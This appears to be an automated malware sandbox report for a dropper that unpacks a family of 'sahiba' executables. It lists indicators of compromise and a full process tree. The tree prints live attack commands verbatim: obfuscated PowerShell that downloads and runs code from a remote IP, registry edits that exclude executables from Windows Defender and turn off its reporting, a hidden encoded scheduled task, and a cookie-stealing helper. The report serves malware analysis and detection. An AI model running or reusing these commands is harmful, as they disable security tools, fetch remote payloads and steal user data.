Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060
Token: SeCreatePagefilePrivilege	2060
Token: SeShutdownPrivilege	2060

Suspicious use of FindShellTrayWindow 15 IoCs

Processes:

Accostarmi.exe.pif

pid process

3144 Accostarmi.exe.pif
2060
2060
3144 Accostarmi.exe.pif
3144 Accostarmi.exe.pif
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

Accostarmi.exe.pif

pid process

3144 Accostarmi.exe.pif
3144 Accostarmi.exe.pif
3144 Accostarmi.exe.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MCQ3QgtRhIufYCfJaIyqxY4C.exe

pid process

2016 MCQ3QgtRhIufYCfJaIyqxY4C.exe

pid	process
3144	Accostarmi.exe.pif
2060
2060
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
2060
2060
2060
2060
2060
2060
2060
2060
2060
2060

pid	process
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif
3144	Accostarmi.exe.pif

pid	process
2016	MCQ3QgtRhIufYCfJaIyqxY4C.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesahiba_1.exesahiba_7.exerUNdlL32.eXesahiba_6.exe

description	pid	process	target process
PID 2800 wrote to memory of 4484	2800	6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe	setup_install.exe
PID 2800 wrote to memory of 4484	2800	6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe	setup_install.exe
PID 2800 wrote to memory of 4484	2800	6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe	setup_install.exe
PID 4484 wrote to memory of 5028	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 5028	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 5028	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4456	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4456	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4456	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4884	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4884	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4884	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4816	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4816	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4816	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4296	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4296	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4296	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4044	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4044	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4044	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4344	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4344	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4344	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4392	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4392	4484	setup_install.exe	cmd.exe
PID 4484 wrote to memory of 4392	4484	setup_install.exe	cmd.exe
PID 4392 wrote to memory of 4336	4392	cmd.exe	sahiba_8.exe
PID 4392 wrote to memory of 4336	4392	cmd.exe	sahiba_8.exe
PID 4884 wrote to memory of 3276	4884	cmd.exe	sahiba_3.exe
PID 4884 wrote to memory of 3276	4884	cmd.exe	sahiba_3.exe
PID 4884 wrote to memory of 3276	4884	cmd.exe	sahiba_3.exe
PID 4456 wrote to memory of 4832	4456	cmd.exe	sahiba_2.exe
PID 4456 wrote to memory of 4832	4456	cmd.exe	sahiba_2.exe
PID 4456 wrote to memory of 4832	4456	cmd.exe	sahiba_2.exe
PID 4044 wrote to memory of 4840	4044	cmd.exe	sahiba_6.exe
PID 4044 wrote to memory of 4840	4044	cmd.exe	sahiba_6.exe
PID 4044 wrote to memory of 4840	4044	cmd.exe	sahiba_6.exe
PID 4816 wrote to memory of 4880	4816	cmd.exe	sahiba_4.exe
PID 4816 wrote to memory of 4880	4816	cmd.exe	sahiba_4.exe
PID 4296 wrote to memory of 4876	4296	cmd.exe	sahiba_5.exe
PID 4296 wrote to memory of 4876	4296	cmd.exe	sahiba_5.exe
PID 5028 wrote to memory of 3016	5028	cmd.exe	sahiba_1.exe
PID 5028 wrote to memory of 3016	5028	cmd.exe	sahiba_1.exe
PID 5028 wrote to memory of 3016	5028	cmd.exe	sahiba_1.exe
PID 4344 wrote to memory of 3332	4344	cmd.exe	sahiba_7.exe
PID 4344 wrote to memory of 3332	4344	cmd.exe	sahiba_7.exe
PID 4344 wrote to memory of 3332	4344	cmd.exe	sahiba_7.exe
PID 3016 wrote to memory of 2328	3016	sahiba_1.exe	sahiba_1.exe
PID 3016 wrote to memory of 2328	3016	sahiba_1.exe	sahiba_1.exe
PID 3016 wrote to memory of 2328	3016	sahiba_1.exe	sahiba_1.exe
PID 3332 wrote to memory of 2272	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 3332 wrote to memory of 2272	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 3332 wrote to memory of 2272	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 4468 wrote to memory of 4444	4468	rUNdlL32.eXe	rundll32.exe
PID 4468 wrote to memory of 4444	4468	rUNdlL32.eXe	rundll32.exe
PID 4468 wrote to memory of 4444	4468	rUNdlL32.eXe	rundll32.exe
PID 3332 wrote to memory of 720	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 3332 wrote to memory of 720	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 3332 wrote to memory of 720	3332	sahiba_7.exe	jfiag3g_gg.exe
PID 4840 wrote to memory of 1220	4840	sahiba_6.exe	yvVb3OnDifw1pTFJGElhSqnP.exe
PID 4840 wrote to memory of 1220	4840	sahiba_6.exe	yvVb3OnDifw1pTFJGElhSqnP.exe
PID 4840 wrote to memory of 1220	4840	sahiba_6.exe	yvVb3OnDifw1pTFJGElhSqnP.exe
PID 4840 wrote to memory of 4804	4840	sahiba_6.exe	om8iqdKXNWVtdXRfdBnVPTF1.exe

C:\Users\Admin\AppData\Local\Temp\6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe
"C:\Users\Admin\AppData\Local\Temp\6f6585d3df024c6e411a075d856c79cc7a70e5509006e53dcaafeb8fc418fdf8.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2800

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:5028

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_1.exe
sahiba_1.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3016

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_1.exe" -a
5⤵
- Executes dropped EXE
PID:2328

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4884

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_3.exe
sahiba_3.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1616
5⤵
- Program crash
PID:2136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4456

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_2.exe
sahiba_2.exe
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4344

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_7.exe
sahiba_7.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3332

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:2272

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_8.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4392

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_8.exe
sahiba_8.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4044

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_6.exe
sahiba_6.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4840

C:\Users\Admin\Documents\yvVb3OnDifw1pTFJGElhSqnP.exe
"C:\Users\Admin\Documents\yvVb3OnDifw1pTFJGElhSqnP.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1220

C:\Users\Admin\Documents\yvVb3OnDifw1pTFJGElhSqnP.exe
C:\Users\Admin\Documents\yvVb3OnDifw1pTFJGElhSqnP.exe
6⤵
- Executes dropped EXE
PID:4080

C:\Users\Admin\Documents\fgonyScoboSFjO8z3rcj_JDG.exe
"C:\Users\Admin\Documents\fgonyScoboSFjO8z3rcj_JDG.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2332

C:\Users\Admin\Documents\0ZUsRGyIunM4BUOMObxAb2Ab.exe
"C:\Users\Admin\Documents\0ZUsRGyIunM4BUOMObxAb2Ab.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1380

C:\Users\Admin\Documents\t4wXirUdDfc0NMCST630Ti36.exe
"C:\Users\Admin\Documents\t4wXirUdDfc0NMCST630Ti36.exe"
5⤵
- Executes dropped EXE
PID:3248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 440
6⤵
- Program crash
PID:3604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 432
6⤵
- Program crash
PID:4956

C:\Users\Admin\Documents\P4FjToOed9vkSKb02SfrskvH.exe
"C:\Users\Admin\Documents\P4FjToOed9vkSKb02SfrskvH.exe"
5⤵
- Executes dropped EXE
PID:4144

C:\Users\Admin\Documents\QNx2au99jZOzxxcSOLSNb51Q.exe
"C:\Users\Admin\Documents\QNx2au99jZOzxxcSOLSNb51Q.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:2392

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im QNx2au99jZOzxxcSOLSNb51Q.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\QNx2au99jZOzxxcSOLSNb51Q.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:3976

C:\Windows\SysWOW64\taskkill.exe
taskkill /im QNx2au99jZOzxxcSOLSNb51Q.exe /f
7⤵
- Kills process with taskkill
PID:3492

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:4884

C:\Users\Admin\Documents\J4qbPI8msN1WdR4e4WRAMl8c.exe
"C:\Users\Admin\Documents\J4qbPI8msN1WdR4e4WRAMl8c.exe"
5⤵
- Executes dropped EXE
PID:2224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 432
6⤵
- Program crash
PID:1788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 440
6⤵
- Program crash
PID:2872

C:\Users\Admin\Documents\fc5_kN9xDQPwjhBX2SG_jB7p.exe
"C:\Users\Admin\Documents\fc5_kN9xDQPwjhBX2SG_jB7p.exe"
5⤵
- Executes dropped EXE
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 432
6⤵
- Program crash
PID:3276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4488 -s 440
6⤵
- Program crash
PID:5016

C:\Users\Admin\Documents\MCQ3QgtRhIufYCfJaIyqxY4C.exe
"C:\Users\Admin\Documents\MCQ3QgtRhIufYCfJaIyqxY4C.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
6⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
7⤵
PID:3680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NAN.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
6⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2644

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
7⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4276 -s 300
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.192/-RED/NON.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}','');I`E`X $TC|I`E`X
6⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:1416

C:\Users\Admin\Documents\om8iqdKXNWVtdXRfdBnVPTF1.exe
"C:\Users\Admin\Documents\om8iqdKXNWVtdXRfdBnVPTF1.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
6⤵
PID:4020

C:\Windows\SysWOW64\cmd.exe
cmd
7⤵
PID:1772

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
8⤵
- Enumerates processes with tasklist
PID:3844

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
8⤵
PID:4072

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
8⤵
- Enumerates processes with tasklist
PID:4384

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
8⤵
PID:3720

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
8⤵
PID:2888

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3144

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
9⤵
- Executes dropped EXE
PID:2900

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
9⤵
- Executes dropped EXE
PID:4536

C:\Users\Admin\Documents\HgFEqI8Q4GeLOhnHvzmvLrT1.exe
"C:\Users\Admin\Documents\HgFEqI8Q4GeLOhnHvzmvLrT1.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 840
6⤵
- Program crash
PID:3972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1320
6⤵
- Program crash
PID:4060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1328
6⤵
- Program crash
PID:3420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1360
6⤵
- Program crash
PID:3732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "HgFEqI8Q4GeLOhnHvzmvLrT1.exe" /f & erase "C:\Users\Admin\Documents\HgFEqI8Q4GeLOhnHvzmvLrT1.exe" & exit
6⤵
PID:4976

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "HgFEqI8Q4GeLOhnHvzmvLrT1.exe" /f
7⤵
- Kills process with taskkill
PID:3656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 1356
6⤵
- Program crash
PID:920

C:\Users\Admin\Documents\kyqLHDjSldvVtuYQLHsul8B1.exe
"C:\Users\Admin\Documents\kyqLHDjSldvVtuYQLHsul8B1.exe"
5⤵
- Executes dropped EXE
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 432
6⤵
- Program crash
PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 440
6⤵
- Program crash
PID:2736

C:\Users\Admin\Documents\3iJ7eDr9Dz2kS9Sjq969lBsr.exe
"C:\Users\Admin\Documents\3iJ7eDr9Dz2kS9Sjq969lBsr.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:1488

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:2736

C:\Users\Admin\Documents\fb4Rr_C87lDEH0cSQMgyCqct.exe
"C:\Users\Admin\Documents\fb4Rr_C87lDEH0cSQMgyCqct.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2140

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:3036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:3896

C:\Users\Admin\Documents\UUCzQYLXZfVc0_W9PhszKON0.exe
"C:\Users\Admin\Documents\UUCzQYLXZfVc0_W9PhszKON0.exe"
5⤵
- Executes dropped EXE
PID:4988

C:\Users\Admin\Documents\JC0tW1faoERPvjcN8G7oDaJ4.exe
"C:\Users\Admin\Documents\JC0tW1faoERPvjcN8G7oDaJ4.exe"
5⤵
PID:4360

C:\Users\Admin\Documents\MiFMEHU75a3HaqwZQDbw0EzA.exe
"C:\Users\Admin\Documents\MiFMEHU75a3HaqwZQDbw0EzA.exe"
5⤵
- Executes dropped EXE
PID:2092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\MiFMEHU75a3HaqwZQDbw0EzA.exe
6⤵
PID:3068

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
7⤵
PID:5008

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4296

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_5.exe
sahiba_5.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sahiba_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4816

C:\Users\Admin\AppData\Local\Temp\7zS0FA42D6D\sahiba_4.exe
sahiba_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:4444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4444 -s 608
3⤵
- Program crash
PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4444 -ip 4444
1⤵
PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3276 -ip 3276
1⤵
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4488 -ip 4488
1⤵
PID:3176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2224 -ip 2224
1⤵
PID:2612

C:\Users\Admin\AppData\Local\Temp\7zS16AD.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
PID:3700

C:\Users\Admin\AppData\Local\Temp\7zS2BBC.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:3644

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:2180

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:3856

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:4544

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:1864

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:2532

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:4552

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:1888

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:1436

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gKvnsJPlr" /SC once /ST 00:19:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1424

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gKvnsJPlr"
3⤵
PID:3068

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gKvnsJPlr"
3⤵
PID:3668

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\DNLeutF.exe\" j6 /site_id 525403 /S" /V1 /F
3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4252 -ip 4252
1⤵
PID:1052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4488 -ip 4488
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4252 -ip 4252
1⤵
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 3376 -ip 3376
1⤵
PID:1116

